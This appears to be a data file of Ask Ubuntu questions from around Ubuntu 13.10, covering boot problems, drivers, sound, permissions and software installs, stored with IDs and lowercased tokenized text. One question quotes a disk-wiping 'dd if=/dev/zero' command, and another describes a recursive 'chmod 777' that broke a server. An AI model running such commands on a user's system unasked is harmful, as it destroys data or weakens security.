374896	no vpn connections option on network manager	i use ubuntu 13.04 and tried to configure a vpn . in the network manager i should have an option to configure vpn , which i do n't . where can i find this ?
374898	internal microphone on 13.10 not working	i have seen many posts on this , but none of the fixes have worked for me . using 13.10 , on a toshiba satellite r850 dual booting with windows 8.1 . microphone works perfect in windows but can not get it working in lubuntu so i have eliminated the hardware being faulty . using alsamixer : i have maxed the master mic > mic boost > internal mic boost and all the way down to min without result . many of the fixes suggest changing the capture but i do not have this as an option . using arecord -d 10 /tmp/test-mic.wav to test : all i get is white noise and no recording . sound output on other files is perfect and the built in camera works perfect as well .
374901	user www-data in custom group does not give other user write access	this is somewhat confusing for me so i hope someone can quickly explain the run down once and forall . i have a user , `` john '' , and group created named `` john '' . i make john a `` primary group members '' of group john , and user www-data a member also of group john . i create /home/john and chown john : john . files and directories are chmod 755 , so it makes sense then that www-data can not write , which i want it to . do i need to chmod everything to 775 , or is there a better way to go about this securely ?
374902	shotwell 0.15 imports old images to 'no event ' despite exposure date . how do i get them organized ?	i have imported a bunch of images ( originally with 0.14 ) and they all went to `` no event '' folder . however most photos do have the exposure date tag ( at least shotwell shows them ) i can create a new event , no problem but how do i get them into the correct spot in the date tree ? automatically ? i imported another folder with 0.15 just to test and i get the same result - it wo n't go into the date tree structure but into `` no event '' . am i doing something wrong ? i have noticed that newer photos show up with date in the bottom left corner and import correclty . those old photos only show the 'exposure date ' in extended info view . thanks !
374904	black screen after kubuntu loads	i get a black screen after booting . i can see the power notification of jupiter but after that there is just black screen and mouse pointer . i have enabled auto login . i saw some of the answers related to this but i ca n't open terminal or anything by pressing alt+f2 or other combination . i have a dual boot with windows 8 system and i think this happened after my windows update failed . i have installed kde over default unity in ubuntu 13.10
374905	why nothing happens when booting through usb ?	i recently installed ubuntu 13.10 in my laptop . i was playing around with installing apps and softwares . now i know what i want in my laptop and wanted to start with a clean ubuntu 13.10 . i created bootable usb stick under ubuntu . followed the instructions via startup disk creator . then when i restart my laptop , it stays blank for awhile . i guess i get worried quick.. hehe.. is that normal ? should i just leave it as it will reinstall itself ?
374908	can i use my ubuntu hdd on other computers ?	i have been running ubuntu for a bit now . today my motherboard died and i want to know if i can plug my hdd to another computer , would it boot and run ubuntu normally . heard ca n't do that with windows .
374911	how to resize images in 13.10 with context menu ?	i want to resize image with the context menu ( or similar easy way ) in ubuntu 13.10 . i read about nautilus-image-converter and installed it . but it does not show up , even after system restart . how to fix that ?
374913	which ubuntu 12.04.3 is best for device lc2430i ?	which ubuntu version should i download for new linux-certified laptop ? device name : lc2430i memory : 3.8gib processor:3rd generation intel core i5-3210m cpu @ 2.5ghz x 4 ( 3mb l3cache,2c+ht ) os type : 64-bit graphics : intel ivy bridge mobile disk : 483.8gb note : this laptop came with ubuntu 13.04 but we ordered 12.04 lts , i want the long term system not systems that only have support for 6 months .
374914	how to replace echo command with print command ?	i am tying to print a line `` hello everyone '' using echo i can print it like echo `` hello everyone '' but when i replace echo with print like print `` hello everyone '' i get error message . here 's my prompt niraj @ niraj-vpceb4l1e : ~/religion $ echo `` hello world '' hello world niraj @ niraj-vpceb4l1e : ~/religion $ print `` hello world '' warning : unknown mime-type for `` hello world '' -- using `` application/octet-stream '' error : no such file `` hello world '' niraj @ niraj-vpceb4l1e : ~/religion $ ^c
374915	how to put mainview into maximized	[ using ubuntu sdk to write an application for the desktop ] is there a way to change the window state of the mainview ? mainview { ... width : units.gu ( 100 ) height : units.gu ( 75 ) page { button { anchors.centerin : parent width : units.gu ( 30 ) height : units.gu ( 10 ) text : `` maximize this window '' onclicked : { // do something that maximizes the window } } } }
374918	ethernet/broadband internet on ubuntu ( 12.04.3 lts ) ?	how can i connect to the internet in ubuntu by ethernet/broadband cable ? i need to log in with username and password , but i do n't know what to do . can someone tell me which steps should i take ?
374921	need to determine the bootup history of ubuntu	i need to determine all the times ubuntu has been booted up and a log of all the applications that were used . something equivalent to history on browsers . how do i do it . any help will be highly appreciated .
374923	ubuntu does n't recognize windows 8.1 and vice versa . do n't get an option to select which os to boot !	i just managed to install ubuntu 13.10 . at first it said it ca n't fins any other oses on the laptop ! but i selected the lower option and managed to partition and format a drive to install ubuntu . i was then able to boot only into ubuntu ! i fixed the bios and made windows boot first , but it still does n't give me the option at boot . how can i do this ? thanks : )
374924	ssd card locked to launcher after wakening from sleep mode	whenever i wake my laptop from sleep mode the ssd card is locked to the launcher . it is not though after booting . how can i avoid this behaviour ? to avoid misunderstandings : i do want the ssd card to be mounted , i just do n't want it to be automatically locked to the launcher . version : ubuntu 13.10
374927	equivalent of /dev/nvidia0 for intel ?	nvidia video cards have a folder in /dev called nvidia0 . what is the equivalent folder for intel video cards ? running lspci | grep vga reports : intel corporation 3rd gen core processor graphics controller ( rev 09 ) .
374928	missing icons in system settings	this a screenshot of my system settings window . as you can see i am missing the icons for : `` appearance '' , '' online accounts '' , `` security & privacy '' , and `` time & date '' . how can i restore them ? for comparison this is a screenshot of the default systems settings window in ubuntu 13.10 .
374930	can not install apps from the ubuntu software centre	i use ubuntu 13.10 . when i click on any app to download , it shows progress 1 . it loads for 2-4 seconds and then it stops . please help .
374931	install ubuntu in uefi mode ( unable to boot from usb )	i recently bought a dell inspiron 15r se with windows 8 ( 64 bit ) pre-installed ( uefi supported ) . i want to install ubuntu in dual boot with windows 8 . i tried to follow all instruction here : https : //help.ubuntu.com/community/uefi and here : installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) so , i set secure boot to `` off '' into bios and i disable fast startup as described here : http : //www.eightforums.com/tutorials/6320-fast-startup-turn-off-windows-8-a.html i created a bootable usb key for ubuntu ( ubuntu 13.10 64bits international edition ) with unetbootin . the problem is i am unable to boot from the usb key . the computer tries to boot into infinite loop ( when the usb key is plugged in , the computer starts and the dell logo appears . the little blue progressbar is growing normally . when it is complete , the computer restarts and does the same thing ) . i also tried to boot from usb with `` legacy boot '' option instead of uefi . in this case , the computer freezes at dell logo . of course , i tried to boot from my usb key on an other computer having normal bios and it works perfectly . have you ideas about what i need to do to be able to boot from usb ? thanks in advance for your help , adele update : what i have tried : with uefi boot mode : secure option : disabled '' intel speed step '' : disabled windows 8 faststartup : disabled using bootable usb key for ubuntu ( ubuntu 13.10 64bits international edition ) with either unetbootin or linux dd utility result : unable to boot from the usb key . the computer tries to boot into infinite loop . with `` legacy boot '' option : using bootable usb key for ubuntu ( ubuntu 13.10 64bits international edition ) with either unetbootin or linux dd utility result : unable to boot from the usb key . the computer freezes at dell logo . if i press f12 , the computer freezes instantaneously .
374936	`` add event ... '' button , why is there ?	if you click on top right ( by default ) on time , you will see calendar . below calendar there is button `` add event ... '' , but if you click it , it does nothing . why is it there , how can i use it ?
374937	how to record video streamed to firefox	i 'm using ubuntu precise 64 bit . is there an app which will capture video & audio from a tv programme being played on my pc ? i 'm thinking of the video coming on demand . ps by capture , i mean record to disk .
374943	install lubuntu-restricted-extras	i have just installed lubuntu 13.10 . i am trying to install lubuntu-restricted-extras , so i can download/enable adobe flash player or alike ? ( so i can view video content on youtube , etc ) i read the following : when you installed lubuntu , you had a chance to check a box enabling you to install restricted addons that enabled things like mp3/dvd/flash playback . if you forgot to do this , you can still install these packages by opening the lubuntu software center ( version 12.04 and later ) in the menu under system tools . search for “lubuntu-restricted-extras” and , when the selection loads , click “install.” ( i have tried this method but i am unable to find lubuntu-restricted-extras when searching in the lubuntu software center ( typed this in the top right search box ? ) i have also tried to enter this manually by entering - sudo apt-get install lubuntu-restricted-extras in synaptic package manager ... ... but i 'm not sure if i am doing this correctly ! i have also read the following - i installed the extras and all is fine now . there is actually lubuntu-restricted-extras now . please could someone example easy to follow steps the correct procedure if installing a plug-in or adobe flash player ( 1st time using a linux os )
374944	phpmyadmin not working because i changed permissions and do n't know how to change it back	i installed lampp and it worked fine , but i somehow managed to change the permission of the folder /opt/lampp/ to 777 by using this command sudo chmod 777 -f /opt/lampp -r my plans was to do : sudo chmod 777 -f /opt/lampp/htdocs/ -r and now when i 'm going to localhost/phpmyadmin in the browser i get this error : could someone help me to fix this ?
374945	dota 2 is playing on steam , but with broken graphics	i installed steam on lubuntu and wanted to play dota 2 ( it has source engine ) , and it said i need a 3dts driver or something , but i had installed it already . i can start dota now , but when i start a game it is not ... displaying correctly . for example : when i pick a hero , the 3d model is covered in some kind of a lasershow and the map ... i looked around a bit ; i think it is because of the drivers and i should have mesa 9 . steam can show the system specs and it says that i have nouveau gallium 0.4 on nvaa as driver and 3.0 mesa 10.0.0-devel ( git-1100093 saucy-oibaf-ppa ) as driver version and opengl 3.0 .
374949	what is the right way to exit the interactive cli of the command `` rev '' ?	please check the code below and notice the difference between exiting the cat command and rev command heer @ heer-pc : ~ $ cat mark mark ^c heer @ heer-pc : ~ $ rev mark kram ^cheer @ heer-pc : ~ $
374950	how to run a script automatically if there is any specific hardware is detected	i want to run a script automatically when a headset was inserted on its corresponding jack and a usb modem was inserted on its corresponding ports . any help will be appreciated !
374951	kubuntu panel icon resizing problem	this question is from kde users , i am using ubuntu 12.04 lts , i installed kde 4.11.2 in ubuntu , and everything seems fine . but these icons gets very smaller when i select show a icon when not running . i have seen various bugs regarding this but have n't seen any solution to this problem see this screenshot ( computer icon on the panel ) i want this to be fixed , as this feels very tiny , before selecting , show a icon when not running it was equal to chrome icon , given in the same screenshot . how to fix this ?
374955	trying to start ubuntu , but grub shows up !	i 've installed ubuntu using wubi in windows 7 . it was working fine . but now whenever i start ubuntu , it says bash line command editing ... grub > how to load ubuntu now ?
374961	`` read error '' on boot	so my computer froze while it was in powersave mode , and i could not reboot it with reisub , or access it over the network , forcing me to hard reboot . when i rebooted , i was greeted with the message `` read error '' in the top left corner . i booted into a livecd , and tried fdisk -l which gave me the following output : root @ ubuntu : /home/ubuntu # fdisk -l fdisk : unable to read /dev/sda : inappropriate ioctl for device i immediately imaged the drive with gddrescue , and then proceeded to run e2fsck . that seemed to complete successfully , and now when i run fsck , i get : fsck from util-linux 2.20.1e2fsck 1.42.8 ( 20-jun-2013 ) /dev/sda1 : clean , 1475560/18317312 files , 48594157/73242187 blocks so all seems good over there . however , i still can not get any output from fdisk , and when i reboot , i still get the same error .
374963	can not execute just compiled binary file	and once again , typical question : `` can not run executable file '' . i installed virtual box ver : 4.2.16 and on that ubuntu . i compiled several fotran codes with command ( maybe it should be noted that i was at that moment ask to install gfortran , so i did . ) : gfortran -o iri iritest.for irisub.for irifun.for iritec.for iridreg.for igrf.for cira.for iriflip.for i got some warnings but no error . then i wrote . iri and got : bash : . : iri : can not execute binary file as i read many a/q about it on this page : here are the helpful information : uname -a linux pavel-virtualbox 3.5.0-43-genereic # 66~precise1-ubuntu smp thu oct 24 14:55:08 utc 2013 i686 i686 i 386 gnu/linux file iri iri : elf 32-bit lsb executable , intel 80386 , version 1 ( sysv ) , dynamically linked ( used shared libs ) , for gnu/linux 2.6.24 , buildid [ sha1 ] =0xac4e2cda297fb7fc0dbea9bff7c88dfdb417c297 , not stripped file /bin/bash /bin/bash : elf 32-bit lsb executable , intel 80386 , version 1 ( sysv ) , dynamically linked ( used shared libs ) , for gnu/linux 2.6.24 , buildid [ sha1 ] =0x64552078250a29637d1678751065aa4b5ee35222 , not stripped i also tried chmod +x iri and got the same result . however i think that is was unnecessary as the output of ls -l before was : -rwxrwxr-x 1 pavel pavel 1170853 nov 10 13:30 iri i also sent the file to windows and of course , it has no idea what to do with it . as the file and os specifications are the same , i have no idea why the ubuntu refuses to execute the file . do you have an idea ?
374973	repair file names	how can i repair filenames that contains characters that looks like rectangulars with some numbers in it . ( translated from german umlauts ) there is a tool like convmv , but i do n't know what parameters i 've to set . thx
374976	is it possible to do partitioning using gparted while os is running ?	it ok to make new partitions when system is already installed ? just open gparted and start to make new partitions , or is it recommended during os installation process ?
374977	customedid option does not work anymore in ubuntu 13.10 ( nvidia 319 )	my lg l204wt screen misbehaves when connected digitally , it has always required an extra option in the xorg.conf file , like this : section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 285 '' option `` customedid '' `` dfp-0 : /home/skerit/documenten/bin/l204wt.bin '' endsection and this has always worked fine . until i upgraded tot 13.10 . now the screen remains black . does anyone know what is going wrong ? here 's the complete xorg file : section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` lg electronics l204wt '' horizsync 28.0 - 83.0 vertrefresh 56.0 - 75.0 modeline `` 1680x1050 @ 55 '' 140.00 1680 1712 2240 2272 1050 1071 1081 1103 modeline `` 1680x1050 @ 61 '' 146.25 1680 1772 1948 2204 1050 1053 1059 1089 +hsync -vsync option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` geforce gtx 285 '' option `` customedid '' `` dfp-0 : /home/skerit/documenten/bin/l204wt.bin '' endsection section `` screen '' # removed option `` metamodes '' `` dfp-0 : nvidia-auto-select +800+0 , dfp-1 : nvidia-auto-select +0+0 '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` stereo '' `` 0 '' option `` nvidiaxineramainfoorder '' `` dfp-1 '' option `` metamodes '' `` dfp-0 : nvidia-auto-select +1920+150 , dfp-1 : nvidia-auto-select +0+0 '' subsection `` display '' depth 24 endsubsection endsection
374978	ubuntu 13.10 : no bluetooth adapters found	my notebook is fujitsu lh532 with bluetooth version 4.0 ( smart ready ) . i have dual boot of windows 8 and ubuntu 13.10 . the bluetooth work fine in windows 8 but it can not be found in ubuntu 13.10 . i did n't find the solution from askubuntu and therefore i post the problem to here again . i think it could be the problem of new bluetooth driver ?
374979	is ls printing wrong information for read-only ntfs mount ?	i have this entry in my fstab ( note the ro option ) uuid=xyz /win ntfs defaults , ro 0 0 ls / -l reads drwxrwxrwx 1 root root 8192 nov 7 10:41 win if i try to copy something into /win/ , either normal or with sudo i get cp : can not create regular file â/win/foo.barâ : read-only file system i expected this behaviour , as i specified the mountpoint with the read-only option . what i do n't get is why ls is saying , the directory is rwx for everybody , when in fact this is absolutely not the case . is this a bug with ls , or is ls just not made for read-only file systems or for ntfs ? my ls version is 8.20 .
374980	how to reinstall libreoffice from cd ?	i switched to kingsoft office a few months ago and decided to remove libreoffice completely . but now i regret , i want to install libreoffice again and uninstall kingsoft . but after i check the latest version of libreoffice i have to download 183 mb of the main installer file , which is hurt for my slow internet connection . i have ubuntu 12.04 desktop x32 live cd . now , is it possible to reinstall the software with the existing cd ?
374981	checksums are different	the ubuntu image file `` ubuntu-13.10-desktop-i386.iso '' which i 've downloaded checksum is different . if i proceed to install will it get installed or not ? even if it gets installed will it work properly ? even if it is working properly will it be having all the functions ? i had used `` orbit downloader '' to download the file . i had to pause & restart the download due to internet problems & while downloading i had accidently pressed the power button & windows shut downed . sorry for too many question .
374983	automatically show the main widget at startup/load in glade ?	using natty 11.04 , glade 3.8.0 : make a new glade project , add a window , save as test.glade . close glade . open glade again with test.glade as file ; both open dialog and via command line : glade test.glade , result with the same window : that is , window is empty , even though it looks as if the file loaded ! this immediately makes me think something is wrong , and i get pissed . then , one just needs to click the 'window1 ' node in upped right corner - and by selecting it , the window finally shows : given i extremely dislike this extraneous step of clicking the node to show the contents at load - is there a way to make glade select this node automatically when loading a file , so the contents are shown as soon as the file is loaded ?
374985	disk not choosable on startup disk creator	i want to create a usb stick or cd with ubuntu live but when i go to startup disk creator the place where you choose the disk is blank even though i have a good clean cd-r in the cd drive . do i need something other than cd-r to do this . i was able to put it on a usb stick without a problem , and it said it was ready to boot from , but when i tried to boot from the stick it kept saying over and over `` vesamenu.c32 : not a com32r image '' then on the next line boot . i did n't know what to enter after the word boot .
374987	need to rebind left arrow key to right control key	i spilled the tiniest amount of water on my laptop and now the left arrow key wo n't respond - can anyone give me a quick runthrough of how to reassign it ( i 'm using ubuntu ) to another key ( probably the right ctrl or another ) ? if the tutorial requires me to press the left arrow key ( perhaps to get its binding id or something ) i wo n't be able to do that . thanks !
374989	can not boot from cd or usb . old computer	i have an old system that i am trying to get back for an old customer . my problem is as follows : mobo only allows the system to boot from the cd drive . nothing else . unfortunately , this drive will not read my dvd install disk for ubuntu . i can not put ubuntu on a cd because the .iso is ~800 mb and the cd only holds 700 . so i can not boot from usb , or dvd , and i can not fit ubuntu onto a cd . how can i put ubuntu onto this hdd . it is pata .
374990	could not upgrade ubuntu 13.04 to 13.10 after upgrade was interrupted	i was trying to update my ubuntu 13.04 desktop to 13.10 and the software updater was in the point of downloading the updates when my laptop shutdown unexpectedly due to cooling issues . now , when i try to run software updater again , it would try to get updates but it would freeze on the message somewhat like `` checking updates '' , with the button `` finished '' . checking on the system status , it is still 13.04 . would like to ask for your assistance on how to fix the software updater to be able to update to 13.10 . thanks .
374993	problem installation	i 'm trying to install ubuntu touch on my nexus , but , after i did everything written in the guide , at the end of installation on the screen of my nexus there 's thin frase `` root access possibly lost . fix ? '' and the phone in stuck . what can i do ? thanks
374996	how to improve my backup strategy ( rsync ) ?	i 've seen the qas about backup solutions , but i 'm asking anyway . one because it 's a personal situation i have n't solved yet , and two , because the answer can be useful for others . my situation is rather simple . i have two computers with two users and one external hard-drive . i want to sync/backup a shared directory . currently i use rsync with the -azvu options to sync to the external drive . my problem is the round-trip . all deleted files are restored ! using rsync i 'm doing computer a -- > external disk -- > computer a computer b -- > external disk -- > computer b ( i should probably do external disk -- > computer a as a last step ) i 've seen 'bup ' mentioned and other qa talk about dropbox + rsync ... another option is maybe to delete files from rsync ? can my running backup strategy be improved in some other way ?
374998	howto run jupiter script as superuser in lubuntu-rc.xml ?	i 'm trying to bind to my asus eee hotkeys couple of jupiter functions to work as on windows . the problem is that i have to run those as superuser . under terminal scripts are working fine so i put in my ~/.config/openbox/lubuntu-rc.xml : < keybind key= '' xf86launch6 '' > < action name= '' execute '' > < command > sudo /usr/lib/jupiter/scripts/cpu-control < /command > < /action > < /keybind > aaaaaand ... it partially works . some of files to change with this script was changed and other no . some of the changed one are locked so sudo probably working . i have no idea how to debug this cause i do n't know where to find log of this . i 'm lil ' bit ashamed but i do n't know how exactly sudo works . i do n't want to put my password every time to change cpu frequency or toggle touchpad so i do n't want to use gksu or other sudo gui .
374999	while installing kde 4.11 through terminal showing error while 'processing initramfs-tools '	the full output is -- -- -- - setting up initramfs-tools ( 0.103ubuntu0.2.1 ) ... update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.5.0-42-generic cp : can not stat ‘/module-files.d/libpango1.0-0.modules’ : no such file or directory cp : can not stat ‘/modules/pango-basic-fc.so’ : no such file or directory e : /usr/share/initramfs-tools/hooks/plymouth failed with return 1. update-initramfs : failed for /boot/initrd.img-3.5.0-42-generic with 1. dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : initramfs-tools e : sub-process /usr/bin/dpkg returned an error code ( 1 )
375000	is sudo dd taking too long to wipe hard drive ?	i have a 200gb hdd which i removed from a macbook due to several corrupt files in startup . one thing led to another and i decided that i needed to format the drive . i used the command sudo dd if=/dev/zero of=/dev/sdb which is supposed to wipe everything off of the hard drive . it is my understanding that the command writes 0 's over every bit on the drive , which i would imagine must take a while . the process has been going for about 18 hours now . i can use other functions of operating system like the web browser and i can even use another terminal window , so i know the system is not frozen . should i restart the process or let it continue on ? any advice will help . thanks . by the way , i already noticed a post similar to this that was previously answered though the user was not using the same command as i was .
375002	gdebi-core is n't recognized as a command	i am trying to host a minecraft server and i found a pdf which tells me to do this : so i followed these commands but when i tried the command : gdebi-core webmin_1.620_all.deb i get the message : gdebi-core : command not found when i try : sudo dpkg -i webmin_1.620_all.deb i get this : what am i doing wrong here ?
375005	lost network interface after mac change	i 'm using ubuntu server 12.04 inside virtualbox and everything was working as expected , but since i changed the mac address in virtualbox network settings the network interface is not being recognized on ubuntu . i do n't remember the old mac address and everytime ubuntu starts shows waiting for network configuration when i use ifconfig only appears lo ( loopback device ) and eth0 is lost , how can i fix this problem ?
375011	i ca n't get gutenprint to install with 13.10	the install printer dialog offers gutenprint drivers then stalls when i try to install them . ran alien to unload canons linux drivers for the printeraqnd got this message : patrickxxxaspire-5253 : ~/downloads $ sudo alien cnijfilter-common-2.60-4.src.rpm cnijfilter-common-2.60-4.src.rpm is for architecture i386 ; the package can not be built on this system specifications : printer : canon pixma ip4200 how can i get this olved ?
375012	how instal matlab on ubuntu ?	i have matlab 2013a for windows . its difficult to download matlab for for linux . it 's about 5.6gb also its only for windows . any tricks which used to install the matlab windows setup to ubantu . because i have windows 8 but i do n't like the os . i am planned to install ubuntu . also i am a matlab programmer . matlab is must for me .
375013	im trying to install and run ubuntu server on oracle virtual machine ?	i have vm installed on i have downloaded the iso . when i run the server and select the iso file i get the error message ; failed to open the optical disk file c : \users\owner\virtualbox vms\server4\ubuntu-12.04.3-server-i386.iso . could not get the storage format of the medium 'c : \users\owner\virtualbox vms\server4\ubuntu-12.04.3-server-i386.iso ' ( verr_not_supported ) . result code : vbox_e_iprt_error ( 0x80bb0005 ) component : medium interface : imedium { 05f2bbb6-a3a6-4fb9-9b49-6d0dda7142ac } callee : ivirtualbox { fafa4e17-1ee2-4905-a10e-fe7c18bf5554 } callee rc : vbox_e_object_not_found ( 0x80bb0001 )
375014	how do i enable cd-in ?	i have a tv card that is connected to the cd-in ( jcd1 ) connector on my mother board . however , i could not find a setting in pavucontrol to playback the sound from that port in ubuntu . am i just missing something or do i need to install additional software ? the cd port also does not show up in alsamixer . i found a fix for realtek alc1200 codec here but it did n't work for me ( my board is using realtek alc888 ) .
375020	unity no longer loads in 13.04 for main user	when ubuntu starts up , unity fails to load ( i can only see my desktop with no unity sidebar and no system bar in the top right ) . i tried the advice of unity does not start in ubuntu 13.04 which recommended the following commands : dconf reset -f /org/compiz/ unity -- reset-icons & disown i ran the commands without errors an restarted the computer , but the problem persists . i am currently running gnome . i have looked at other pages from the google search `` ubuntu unity failed to load 13.04 '' , but the advice was similar to above and seems to be concerned with a system upgrade in april 18 , 2013 . i suspect my issue is something far more recent . please give me advice on how to restore unity on my account or at least figure out what the problem is . thank you . some information that might be relevant : unity has worked fine on 13.04 for the 6 months that i 've had it until today . ( november 10 , 2013 ) i have set up the update tool to automatically update when available . it is very possible that the system applied some updates without my knowledge . interestingly , unity works fine on the guest account . i have made it so the system automatically logs me in at start-up . this is a personal laptop . no one else has access to it . i was not doing anything with the system settings or the terminal and have not installed any new software for the past 3 days . i am running the system76 native linux laptop ultra lemur . i did not contact their support yet because it seemed unlikely that this is a system76-specific error .
375027	after upgrading to ubuntu 13.10 dash does not give any applications	after upgrading to ubuntu 13.10 , when i click on the dash icon i can only see social network messages search results . i ca n't type in applications or see a list of applications to launch . solved , found solution on this site , forgot which one : - ) cheers
375028	test ubuntu touch	i would like to install ubuntu touch on my tablet . it 's a prestigio pmp5297c quad . is it possible to install it on this tablet and how ? i read the instructions on the web but it 's basically for nexus . i would like to test it but i do n't want to brick my tablet in the process . thanks .
375034	nautilus window focus/stacking order when drag and dropping files/folders into applications	in the ms windows when you have opened explorer ( file/folder explorer eq nautilus in ubuntu ) and another application opened on top of that ( for example explorer in full screen mode and some application opened in windowed mode on top of that ) and you click on the file/folder explorer that window gets the focus . so far this works exactly the same in the ubuntu . however when you have the same situation and you click and drag on some file or folder than the file explorer window does not get the focus which allows you to drag and drop items from that folder into that application very quickly and easily . how can i achieve the same behavior in the ubuntu ? in case its not clear what i am asking for i will try to write it with another words . when you have more than one windows/applications stacked and you click or click and drag into one of them that window gets the focus and is moved to the top of the stacking order . as a result it cover other windows . i want to leave the stacking order as is when i click and drag some file or folder and only changes this stacking order when i just single click into that application window . it works exactly as i want it to when i drag and drop files from desktop into some application . i often work with multiple windows/applications opened at the same time and disability to easily drag and drop files and folder from nautilus into my apps is very annoying to me and it slows me down more than i am willing to sacrifice .
375037	alfa awus036nhr connection issues	i 'm running ubuntu 13.10 , and the wifi card , broadcom bcm4313 , running driver wl0 , shows networks but wo n't connect to them . i 've kind of given up trying to fix this , and bought an external wifi adapter , an alfa awus036nhr , which uses the driver rtl8192cu . this works ok , but every few minutes , the connection freezes . sometimes it is fixed by disconnecting and re-connecting to the ap , but sometimes i have to un-plug it and plug it in again . i can also re-set it by removing and re-loading the driver with modprobe , but i 'd like to know if there 's a definitive solution to this . thanks in advance . btw . i am using a lenovo g580
375038	how to set up a network printer	why is this so hard ? i can reach my printer by http : //myprinterip:631 when i do system-config-printer , the printer makes some noises , then i get the printing-localhost dialog . i try to add a printer , but nothing seems to make sense . under ipp it asks for a host . i type in the ip , but the `` forward '' button remains grey . what an i supposed to do to add this network printer ?
375046	ubuntu desktop messed up !	recently i started getting this weird rendering bug . i do n't know where it came from , but it just started happening . i was n't even able to think of a name of what may be the cause , so i was n't able to google it . i also get weird flickering problem from time to time . hope this image helps :
375047	easy steps for installing ubuntu	i 'm totally inspired by the ubuntu simple interface but the beginners like me usually get away because i can not understand how to partition the hard drive at the starting of the ubuntu installation.. please elaborate that for 13.10 ubuntu .
375049	where are gedit 's preferences ?	this is incredibly weird . i do n't see `` preferences '' in any of my gedit menus . i 'm running version 3.8.3 . all i want to do is show line numbers , but i ca n't do that without preferences . where the heck are they hiding ? note : i did remove indicator-appmenus because i dislike having the menus detached from the window .
375051	sound does n't work after login in ubuntu 12.04	i used to have 10.04 on this computer and the sound worked fine , but i reformatted and installed 12.04 and now it does not . it 's odd- when the computer boots up to the login screen , it will play the ubuntu tone just fine . once i log in , however , things that use sound lock up . i do n't see any output devices in my `` sound '' application provided by ubuntu . sometimes when i run sudo alsa force-reload it will fix the sound . it will put my `` analog input '' in the output devices list and everything will be great . but this does n't always work , and it 's time-consuming having to reboot my computer several times to get this to work . i have seen references to `` sudo killall pulseaudio '' and this does n't seem to help , although sometimes it seems like if i run some applications that use sound prior to my alsa reload , i will have to killall pulseaudio to get the reload to work . any ideas ?
375052	netinstall with mobile broadband	is it possible to perform a mini.iso net install with a mobile broadband ? i am not sure if the computer will be connected to net automatically .
375053	why does my global menu freeze in ubuntu 13.10 ?	when using ubuntu 13.10 i often get my global menu frozen . for example if i scroll down on the volume icon ( to lower the volume ) the notification and the actual volume is modified 3 to 10 seconds after the action . this behavior is the same with globalmenu entries and every notification icon . this behavior happens randomly to my eye . everything else is working nicely and the bar is never frozen forever . my laptop is a asus x301a .
375054	i have broken my 13.10	i am running ubuntu 13.10 . i was trying to get mysql workbench to work with my version . one of the solutions i found was to add it to the apt/sources.list file . i tried that , but i have ruined everything . now when ubuntu loads , it lets me log in , but then i get a continual litany of `` sorry , the application ( fill in the blank ) ( and , it 's all of them ) has stopped unexpectedly . '' i 'm not sure where to begin to figure out how to fix this . i have a disk for 12.10 but have upgraded to 13.10 through time . should i reinstall the whole thing , or is there a way to fix this ?
375056	re-mapping alt gr key	i want my alt gr key to act the same way as the alt key . i 've found a potential solution which is to open up terminal and run the following commands : xmodmap -e `` clear mod5 '' xmodmap -e `` keycode 108 = alt_l '' this solution works but only temporarily . whenever i restart the computer it reverts back or even if i 'm using my laptop for a few hours the fix is undone . i 'm wondering if their is a permanent solution to this issue . just a little about me , i 've only started using ubuntu in the last few months so i 'm very inexperienced with it so i apologise in advance if i have follow up questions for any potential solutions . many thanks
375059	eclipse 's toolbar is displaying incorrectly unless i run eclipse as root	i just installed ubuntu 13 , and while trying to set up eclipse on my computer i ran into a weird issue- the toolbar in eclipse refuses to function correctly if i do not run the eclipse executable as root . here are screenshots of what i am talking about . the first screenshot is of eclipse when i do not run it as root . the toolbar ( i.e . the bar with 'file , 'edit , ' 'refactor ' and so on ) is merged with the system toolbar . i could bear with this except for the fact that none of the icons are clickable- that is , clicking 'file ' gives no dropdown the next screenshot is of the eclipse when run as root- the toolbar is slightly offset from system toolbar , it has the layout that we all know and love , and is perfectly functional . for the life of me i ca n't figure out why this is happening . i 've tried redownloading eclipse , running it under both open and sun jdk 's , and every situation the same problem arises . as you can imagine it 's rather annoying to have to navigate to the executable , open a terminal , and run it with sudo privilieges whenever i want to open eclipse ( which is a lot ) , so i 'm looking for solutions to this annoyance . i 'm , again , running ubuntu 13 ( never had this problem with 12 ) , using the sun jdk . the owner of the executable is me . if it matters before actually opening eclipse and seeing the problems i used the instructions from the top answer of this askubuntu thread to make a desktop icon for eclipse . anyways , hoping to see your answers soon !
375061	problems installing ubuntu 13.10 into windows 8.1	first of all , just to make things clear , i know this had been asked and answered many times and i know it involves secureboot and uefi in most cases . however the windows 8.1 in my laptop is not pre-installed ( i upgraded from windows 7 ) , so there 's no secureboot or uefi to begin with . i tried installing ubuntu 13.10 from a liveusb , created using linux live usb from the guide provided . i 'm able to boot into ubuntu and test it , however when i choose to install ubuntu alongside windows 8 , after this step my laptop just restarts itself and brings me back to the beginning of the installation process ... . this keeps repeating . any ideas ?
375064	unable to import photos using motorola atrix phone into shotwell	i have issues with shotwell . i am getting errors when i plug my camera in . i am unable to import new pictures from my motorola atrix phone . will my pictures still be available on my computer that i previously downloaded if i uninstall shotwell and then reinstall it ? i have a pictures file folder in nautilus that looks like they are all in there .
